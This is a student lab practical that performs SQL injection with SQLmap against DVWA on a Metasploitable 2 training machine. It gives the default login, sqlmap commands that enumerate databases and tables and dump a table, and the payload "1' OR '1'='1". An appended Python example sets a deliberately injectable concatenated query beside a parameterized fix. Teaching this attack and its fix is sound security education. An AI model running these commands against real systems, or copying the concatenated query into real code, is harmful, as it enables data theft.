PRACTICAL NO. 8

Aim: To perform SQL Injection on a data-driven web application using SQLmap.

Procedure: SQL Injection Using SQLmap (DVWA)

Step 1: Access Metasploitable 2
Note the IP address of the Metasploitable 2 machine.
Open the IP address in the browser of the Kali Linux machine.

    http:///

Step 2: Login to DVWA
Select DVWA from the menu.
Login using the following credentials:
Username: admin
Password: password

Step 3: Set Security Level
From the left panel, click DVWA Security.
Set the security level to Low and click Submit.

Step 4: Open SQL Injection Page
From the left panel, select SQL Injection.
Enter any number (e.g., 1) in the input field and submit.
Copy the vulnerable URL from the address bar.

    http:///dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

Step 5: Obtain PHPSESSID
Right-click on the DVWA page → Inspect.
Go to Storage / Application tab.
Copy the value of PHPSESSID.

SQLmap Exploitation Steps

Step 6: Enumerate Databases
Use SQLmap to identify all available databases.

    sqlmap -u "http:///dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
      --cookie="PHPSESSID=; security=low" \
      --batch --dbs

Step 7: Enumerate Tables in DVWA Database
List all tables present in the DVWA database.

    sqlmap -u "http:///dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
      --cookie="PHPSESSID=; security=low" \
      -D dvwa --tables --batch

Step 8: Dump Data from Guestbook Table
Extract and display records from the guestbook table.

    sqlmap -u "http:///dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
      --cookie="PHPSESSID=; security=low" \
      -D dvwa -T guestbook --dump --batch

Result
SQL Injection was successfully performed using SQLmap. Databases, tables, and sensitive data from the DVWA application were extracted.
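
Why the id parameter is injectable and how the query is fixed, as an added example that is not part of the original practical or DVWA's own code: a simplified model in which the lookup is built by string concatenation, beside the same lookup with a bound parameter. The in-memory SQLite table, its rows and the function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the application's user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Alice", "Adams"), (2, "Bob", "Brown"), (3, "Carol", "Clark")],
    )
    return db


def lookup_concatenated(db, user_id):
    """'Before': the request value becomes part of the SQL text itself,
    so quote characters in it can change the structure of the query."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(query).fetchall()


def lookup_parameterized(db, user_id):
    """'After': the SQL text is fixed and the value is bound separately,
    so the database only ever treats it as data to compare against."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (user_id,)).fetchall()


def compare(user_id):
    """Run both lookups against a fresh copy of the constructed table."""
    db = make_db()
    return lookup_concatenated(db, user_id), lookup_parameterized(db, user_id)


if __name__ == "__main__":
    # Constructed inputs: a normal id, and a value containing quote characters.
    for value in ("1", "1' OR '1'='1"):
        before, after = compare(value)
        print(f"id={value!r}: concatenated={len(before)} rows, "
              f"parameterized={len(after)} rows")
```

With the bound parameter, the second input matches no row instead of returning the whole table; rejecting non-numeric id values before the query is a sensible additional check.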